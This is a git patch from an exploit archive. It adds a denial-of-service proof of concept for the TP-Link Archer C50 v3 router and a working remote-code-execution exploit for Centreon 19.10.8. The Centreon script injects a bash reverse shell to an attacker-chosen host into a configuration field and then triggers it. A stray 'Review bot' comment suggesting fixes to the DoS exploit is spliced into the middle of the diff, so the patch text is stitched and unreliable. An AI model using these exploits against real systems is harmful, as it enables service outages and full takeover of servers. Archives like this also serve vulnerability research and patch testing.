From 4b289033f478890e9fb3048403e0b21c6b2c85d2 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 27 Mar 2020 05:01:46 +0000
Subject: [PATCH] DB: 2020-03-27

3 changes to exploits/shellcodes

TP-Link Archer C50 3 - Denial of Service (PoC)
Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution
---
 exploits/hardware/webapps/48255.py | 42 ++++++++++++++
 exploits/php/webapps/48241.py | 1 +
 exploits/php/webapps/48256.py | 91 ++++++++++++++++++++++++++++++
 files_exploits.csv | 2 +
 4 files changed, 136 insertions(+)
 create mode 100755 exploits/hardware/webapps/48255.py
 create mode 100755 exploits/php/webapps/48256.py

diff --git a/exploits/hardware/webapps/48255.py b/exploits/hardware/webapps/48255.py
new file mode 100755
index 000000000..7c0761e12
--- /dev/null
+++ b/exploits/hardware/webapps/48255.py
@@ -0,0 +1,42 @@
+# Exploit Title: TP-Link Archer C50 3 - Denial of Service (PoC)
+# Date: 2020-01-25
+# Exploit Author: thewhiteh4t
+# Vendor Homepage: https://www.tp-link.com/
+# Version: TP-Link Archer C50 v3 Build 171227
+# Tested on: Arch Linux x64
+# CVE: CVE-2020-9375
+# Description: https://thewhiteh4t.github.io/2020/02/27/CVE-2020-9375-TP-Link-Archer-C50-v3-Denial-of-Service.html
+
+import time
+import socket
+
+ip = '192.168.0.1'
+port = 80
+
+print('[+] IP : ' + ip)
+print('[+] Port : ' + str(port))
+
+for i in range(2):
+    time.sleep(1)
+    try:
+        print('[+] Initializing Socket...')
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.settimeout(5)
+        print('[!] Connecting to target...')
+        s.connect((ip, port))
+        header = 'GET / HTTP/1.1\r\nHost: {}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0\r\nReferer: thewhiteh4t\r\n\r\n'.format(ip)
+        header = header.encode()
+        print('[!] Sending Request...')
+        s.sendall(header)
+        print('[!] Disconnecting Socket...')
+        s.close()
+        if i == 1:
+            print('[-] Exploit Failed!')
+            break
+    except Exception as e:
+        if 'Connection refused' in str(e):
+            print('[+] Connection Refused...Exploit Successful!')
+            break
+        else:
+            print('[-] Exploit Failed!')
+            break
\ No newline at end of file
diff --git a/exploits/php/webapps/48241.py b/exploits/php/webapps/48241.py
index 2d0a3ce6b..68db0f529 100755
--- a/exploits/php/webapps/48241.py
+++ b/exploits/php/webapps/48241.py
@@ -5,6 +5,7 @@
 # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.4.zip
 # Version: rConfig 3.9.4
 # Tested on: Cent OS 7 (1908)
+# CVE: CVE-2020-10879
 
 #!/usr/bin/python3
 
diff --git a/exploits/php/webapps/48256.py b/exploits/php/webapps/48256.py
new file mode 100755
index 000000000..d8f361e2e
--- /dev/null
+++ b/exploits/php/webapps/48256.py
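Review bot: The socket created at `s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)` is never released when `s.connect` or `s.sendall` raises, because the only `s.close()` sits after the send inside the `try`; wrapping the connection in `with socket.create_connection((ip, port), timeout=5) as s:` closes it on every path. The success check `if 'Connection refused' in str(e):` matches an OS-supplied error string, which is fragile across platforms and locales; the idiomatic form is a dedicated `except ConnectionRefusedError:` branch ahead of the generic `except Exception`. The header names the CVE but never states what the PoC actually observes, so a reader has to reverse it from the loop: a comment such as `# Success is inferred from the target refusing the second TCP connection, i.e. its web service is no longer accepting clients` would document the symptom an operator sees, and `ip`/`port` being hard-coded constants with no argument parsing belongs in that header too.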
@@ -0,0 +1,91 @@
+# Exploit Title: Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution
+# Date: 2020-03-25
+# Exploit Author: Engin Demirbilek
+# Vendor Homepage: https://www.centreon.com/
+# Version: 19.10.8
+# Tested on: CentOS
+# Advisory link: https://engindemirbilek.github.io/centreon-19.10-rce
+# Corresponding pull request on github: https://github.com/centreon/centreon/pull/8467#event-3163627607
+
+#!/usr/bin/python
+
+import requests
+import sys
+import warnings
+from bs4 import BeautifulSoup
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+if len(sys.argv) < 6:
+    print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
+    exit()
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+
+
+req = requests.session()
+print("[+] Retrieving CSRF token...")
+loginPage = req.get(url+"/index.php")
+response = loginPage.text
+s = BeautifulSoup(response, 'html.parser')
+centreon_token = s.find('input', {'name':'centreon_token'})['value']
+
+login_creds = {
+    "useralias": username,
+    "password": password,
+    "submitLogin": "Connect",
+    "centreon_token": centreon_token
+}
+
+
+print("[+] Sendin login request...")
+login = req.post(url+"/index.php", login_creds)
+
+if "incorrect" not in login.text:
+    print("[+] Logged In, retrieving second token")
+
+    page = url + "/main.get.php?p=50118"
+    second_token_req = req.get(page)
+    response = second_token_req.text
+    s = BeautifulSoup(response, 'html.parser')
+    second_token = s.find('input', {'name':'centreon_token'})['value']
+
+    payload = {
+        "RRDdatabase_path": "/var/lib/centreon/metrics/",
+        "RRDdatabase_status_path": ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(ip, port),
+        "RRDdatabase_nagios_stats_path": "/var/lib/centreon/nagios-perf/",
+        "reporting_retention": "365",
+        "archive_retention": "31",
+        "len_storage_mysql": "365",
+        "len_storage_rrd": "180",
+        "len_storage_downtimes": "0",
+        "len_storage_comments": "0",
+        "partitioning_retention": "365",
+        "partitioning_retention_forward": "10",
+        "cpartitioning_backup_directory": "/var/cache/centreon/backup",
+        "audit_log_option": "1",
+        "audit_log_retention": "0",
+        "submitC": "Save",
+        "gopt_id": "",
+        "o": "storage",
+        "o": "storage",
+        "centreon_token": second_token,
+
+
+    }
+    print("[+] Sendin payload...")
+    send_payload = req.post(page, payload)
+
+    trigger_url= url + "/include/views/graphs/graphStatus/displayServiceStatus.php"
+    print("[+] Triggerring payload...")
+    trigger = req.get(trigger_url)
+
+    print("[+] Check your listener !...")
+
+else:
+    print("[-] Wrong credentials")
+    exit()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 1c5c40274..0c07fad96 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42501,3 +42501,5 @@ id,file,description,date,author,type,platform,port
 48247,exploits/hardware/webapps/48247.py,"UCM6202 1.0.18.13 - Remote Command Injection",2020-03-24,"Jacob Baines",webapps,hardware,
 48248,exploits/php/webapps/48248.txt,"Joomla! Component GMapFP 3.30 - Arbitrary File Upload",2020-03-25,ThelastVvV,webapps,php,
 48250,exploits/php/webapps/48250.txt,"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting",2020-03-25,SunCSR,webapps,php,
+48255,exploits/hardware/webapps/48255.py,"TP-Link Archer C50 3 - Denial of Service (PoC)",2020-03-26,thewhiteh4t,webapps,hardware,
+48256,exploits/php/webapps/48256.py,"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution",2020-03-26,"Engin Demirbilek",webapps,php,